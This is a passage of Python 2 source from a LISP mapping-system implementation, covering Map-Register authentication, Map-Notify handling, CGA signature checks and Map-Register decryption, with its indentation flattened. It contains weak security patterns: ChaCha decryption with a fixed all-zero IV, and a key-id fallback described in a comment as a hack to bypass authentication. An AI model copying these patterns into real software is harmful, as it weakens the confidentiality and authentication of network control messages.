map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
    # Send Map-Notify to xTR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
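#
# Note on the "rtrs_exist ^ rloc_entry.is_rtr()" filter used above: when at
# least one RTR is registered (and the target xTR is not itself one of the
# RTRs), non-RTR RLOCs are skipped; otherwise RTR RLOCs are skipped. The
# Map-Notify therefore carries either the RTR-set or the plain RLOC-set,
# never a mix of the two.
#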
#
# lisp_queue_multicast_map_notify
#
# This function will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
        # The (S,G) RLOC-set could be empty when the last RLE goes away. We
        # will have to search all individual registrations looking for RTRs.
        #
        # We store them in a dictionary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
        # If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
        # to all members (all RLOCs in the sg_rloc_set).
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = [] if len(sg_rloc_set) == 0 else \
sg_rloc_set[0].rle.rle_nodes
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
            # Map-Notify to the RTR instead of the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
            # No ITRs or RTRs found.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
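#
# For reference, a JSON RLOC-record that satisfies the search above carries
# a "signature" key, for example (illustrative values only):
#
#   { "signature-eid" : "[<iid>]<eid>", "signature" : "<base64-signature>" }
#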
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string of hex digits between colons covering the hash length in
# bits. Returns None if the IPv6 EID is not a crypto-hash address. Such
# addresses are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
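#
# Worked example of the extraction loop above: with hash_mask_len = 80, the
# loop pulls five 16-bit chunks off the low-order end of the address, so for
# EID fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 the returned EID-hash string
# is "6dbd:3799:48e1:c6a2:9430" (the trailing colon appended by each
# iteration is stripped by the final eid_hash[0:-1]).
#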
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_eid, pubkey, True/False]. The first two values can be None;
# the final boolean indicates whether the hash lookup succeeded.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
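#
# The registered RLOC-record searched above is expected to carry JSON of the
# form (illustrative value only):
#
#   { "public-key" : "<base64-encoded PEM public-key>" }
#
# registered under the distinguished-name EID "hash-<cga-hash>" in the same
# instance-ID as the crypto-EID.
#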
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
    # Use the signature-EID if it is in the JSON string. Otherwise, the
    # crypto-EID is the signature-EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
    # Look up CGA hash in the mapping database to get the public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
    # a Go signer and a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
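#
# Signer-side sketch matching the verifier above (illustrative only; the
# key pair and signature-EID are hypothetical). The signature data is the
# printed "[<iid>]<eid>" string, hashed with sha256 over a NIST256p curve
# for interoperability:
#
#   key = ecdsa.SigningKey.generate(curve=ecdsa.NIST256p)
#   sig = key.sign("[0]fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430",
#       hashfunc=hashlib.sha256)
#   sig_str = binascii.b2a_base64(sig)
#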
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the concatenation of the xTR address and
# Map-Notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non-encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
    # Parse the first 4 bytes, which are not encrypted. If the packet is not
    # encrypted, return to the caller. If it is encrypted, get the 3-bit
    # key-id next to the e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
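#
# Bit-layout sketch for the header check above (hypothetical header value):
# the e-bit sits at bit 13 of the first 4 bytes in host order, with the
# 3-bit key-id directly above it.
#
#   header = 0x3300e000
#   e_bit = (header >> 13) & 0x1      # -> 1, packet is encrypted
#   ekey_id = (header >> 14) & 0x7    # -> 3, decrypt with key-id 3
#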
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
    # will either return an unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
        # Allow overlapping ams-registered prefixes. Make sure we get the
        # configured parent entry and not the registered more-specific. This
        # registration could be a more-specific of the registered
        # more-specific entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
        # If merge is being requested, get the individual site-eid. If not,
        # and what was cached had the merge bit set, set a flag to issue an
        # error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
        # If TTL is 0, unregister the entry if the source of the Map-Register
        # is in the list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
        # Send Map-Notify if the RLOC-set changed for this site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
    # Send Map-Notify to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
    # The merged Map-Notify will serve as a Map-Register ack, so we don't
    # need to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process has already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
        if (eid_records == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False), rloc.rle.print_rle(False)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
    # Get map-server so we can do statistics and find the auth-key, if an
    # auth-key was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
    # Send out Map-Notify-Ack. Skip over the packet header so
    # lisp_send_map_notify_ack() starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
    #endif
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
